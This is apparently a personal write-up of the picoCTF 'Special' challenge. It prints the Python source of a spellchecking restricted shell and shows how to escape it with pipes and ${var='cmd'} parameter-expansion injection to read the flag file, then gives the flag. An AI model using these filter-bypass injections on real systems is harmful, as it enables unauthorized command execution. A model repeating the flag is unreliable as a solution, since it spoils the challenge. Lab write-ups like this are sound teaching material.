Special

Description

Don’t power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized… automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That’s Special (TM)Start your instance to see connection details.

Additional details will be available after launching your challenge instance.

Hints

Hint(s)

In shell scripting, including bash, the construct $p a r am e t er =^{'} d e f a u l t^{'} i s u se df or p a r am e t ere x p an s i o n w i t ha d e f a u lt v a l u e . L e t m e b re ak d o w ni t sco m p o n e n t s :$ {parameter}: This is the basic form of parameter expansion. It allows you to reference the value of a variable named parameter. ‘default’: This is the default value that will be assigned to the variable if parameter is not set or is null.

Step(s)

first we can check what the script is by finding where the file is by just hitting enter and you will get the response of

Traceback (most recent call last):
  File "/usr/local/Special.py", line 19, in <module>
    elif cmd[0] == '/':
IndexError: string index out of range
Connection to saturn.picoctf.net closed.

This tells us that the script is located at ‘/usr/local/Special.py’

if you use a pipe you can use the cat command example:

Special$ d | cat /usr/local/Special.py
I | cat /usr/local/Special.py 
sh: 1: I: not found
#!/usr/bin/python3
 
import os
from spellchecker import SpellChecker
 
 
 
spell = SpellChecker()
 
while True:
  cmd = input("Special$ ")
  rval = 0
  
  if cmd == 'exit':
    break
  elif 'sh' in cmd:
    print('Why go back to an inferior shell?')
    continue
  elif cmd[0] == '/':
    print('Absolutely not paths like that, please!')
    continue
    
  # Spellcheck
  spellcheck_cmd = ''
  for word in cmd.split():
    fixed_word = spell.correction(word)
    if fixed_word is None:
      fixed_word = word
    spellcheck_cmd += fixed_word + ' '
 
  # Capitalize
  fixed_cmd = list(spellcheck_cmd)
  words = spellcheck_cmd.split()
  first_word = words[0]
  first_letter = first_word[0]
  if ord(first_letter) >= 97 and ord(first_letter) <= 122:
    fixed_cmd[0] = chr(ord(spellcheck_cmd[0]) - 0x20)
  fixed_cmd = ''.join(fixed_cmd)
  
  try:
    print(fixed_cmd)
    os.system(fixed_cmd)
  except:
    print("Bad command!")

Seeing this we can set a parameter to a linux command. for example:

Special$ ${Po='ls -ahl'}
${Po='ls -ahl'} 
total 0
drwxr-xr-x 1 ctf-player ctf-player 20 Nov 15 19:29 .
drwxr-xr-x 1 root       root       24 Mar 16  2023 ..
drwx------ 2 ctf-player ctf-player 34 Nov 15 19:29 .cache
drwxr-xr-x 2 ctf-player ctf-player 22 Mar 16  2023 blargh

When checking what is in the ‘blargh’ folder we find the flag.txt file

Special$ ${Po='ls -ahl blargh'}
${Po='ls rahl blargh'} 
ls: cannot access 'rahl': No such file or directory
blargh:
flag.txt

Getting the flag is as easy as piping the cat command to it now

Special$ a | cat blargh/flag.txt
A | cat blargh/flag.txt 
sh: 1: A: not found
picoCTF{xxxxxxxxxxxxxxxxxxxx}Special$

Flag

Flag

picoCTF{5p311ch3ck_15_7h3_w0r57_0c61d335}

🍵 Christians Pub 🍺

Explorer

2023-11-15-Special

Special

Description

Hints

Step(s)

Flag

Graph View

Table of Contents

Backlinks